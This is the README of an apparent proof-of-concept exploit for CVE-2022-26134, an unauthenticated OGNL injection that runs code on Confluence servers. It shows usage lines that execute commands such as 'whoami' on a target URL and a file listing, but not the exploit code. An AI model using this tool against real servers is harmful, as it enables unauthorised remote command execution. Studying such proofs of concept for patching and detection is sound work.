(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server# CVE-2022-26134
(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server
Require:Python2 or Python3
Usage:
```
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"
```

if target is windows system, please use the script as follows, for example:
```
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
```

[4.0K] /data/pocs/8aa29e6d8ef962be5c4c173de02579c31d9904d8
├── [478K] 1.png
├── [1.6K] cve_2022_26134.py
└── [ 621] README.md
0 directories, 3 files